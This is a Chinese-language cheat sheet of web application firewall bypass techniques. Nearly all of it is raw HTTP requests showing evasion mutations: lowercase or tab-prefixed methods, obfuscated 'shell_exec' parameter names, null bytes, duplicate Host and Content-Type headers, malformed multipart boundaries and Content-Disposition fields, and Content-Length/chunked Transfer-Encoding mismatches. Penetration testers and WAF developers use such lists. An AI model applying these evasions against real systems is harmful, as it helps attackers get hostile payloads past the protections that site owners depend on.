WAF 绕过备忘单

在第一行 HTTP 请求前添加 \r\n

GET /login HTTP/1.1
Host: favoritewaf.com
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)

用小写字母编写方法（Apache）

get /login HTTP/1.1
Host: favoritewaf.com
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)

方法前的选项卡 (IIS)

    GET /login.php HTTP/1.1
Host: favoritewaf.com
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)

GET /login?shell_exec HTTP/1.1

GET /login?shell.exec HTTP/1.1
GET /login?shell[exec HTTP/1.1
GET /login?shell%5bexec HTTP/1.1
GET /login?shell%2eexec HTTP/1.1
GET /login?shell%5fexec HTTP/1.1
GET /login?shell%20exec HTTP/1.1

GET /login.php?pam_param=test3

GET /login.php?pam_param=test1&pam[param=test2&pam%5bparam=test3

GET /login.php?hello=world HTTP/1.1

GET /login.php?hello%00another_text=world HTTP/1.1

HTTP 请求 - absoluteURI

GET http://localhost/login.php HTTP/1.1
Host: favoritewaf.com
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)

双主机头

GET /login.php HTTP/1.1
Host: favoritewaf.com
Host: localhost
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)

小写主机

GET /login.php HTTP/1.1
host: favoritewaf.com
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)

没有空间的主机

GET /login.php HTTP/1.1
Host:favoritewaf.com
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)

带选项卡的主机

GET /login.php HTTP/1.1
Host:	favoritewaf.com
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)

带有附加符号的主机

/ : \x00 \x20 \x09 \xad (IIS)

例子：

GET /login.php HTTP/1.1
Host: favoritewaf.com:12345
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)

GET /login.php HTTP/1.1
Host: favoritewaf.com ignored.text
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)

Content-Type 与另一个文本

POST /login.php HTTP/1.1
Host: favoritewaf.com
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
Content-Type: application/another-text/+++x-www-form-urlencoded

hello=world

Content-Length 不正确的 HTTP 请求（比指定的数据更多）

GET /login.php HTTP/1.1
Host: favoritewaf.com
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
Content-Length: 1

AAAAAAAA

双内容类型

Content-Type: multipart/form-data; boundary=ZZZ
Content-Type: multipart/form-data; boundary=AAA

内容处置突变

GET /login.php HTTP/1.1
Host: favoritewaf.com
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=--------1218108630

----------1218108630
Content-Disposition: form-data; name="hello"

world
----------1218108630--

Content-Disposition: form-data; name="hello"
Content-Disposition: form-data; name="hello
Content-Disposition: form-data; name="hello"world"
Content-Disposition: attachment; name="hello"

Content-Type: multipart/form-data; boundary=x


--x
Content-Disposition:
test1;
--x
test2;
--x--
test3;
name="hello"

world

边界突变 PHP

Content-Type: multipart/form-data; myfavoriteboundaryis=X; boundary=Hello;
==
Content-Type: multipart/form-data; boundary=X;

空字节

Content-Type: multipart/form-data; boundary=HELLO\x00XXXXXXXXX
==
Content-Type: multipart/form-data; boundary=HELLO

忽略的内容长度

Content-Type: application/x-www-form-urlencoded
Content-Length: 11

hello=world

==

Content-Length: 22
Transfer-Encoding: chunked

0B
hello=world
0

==

Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Transfer-Encoding: chunked

3
hel
3
lo=
3
wor
2
ld

0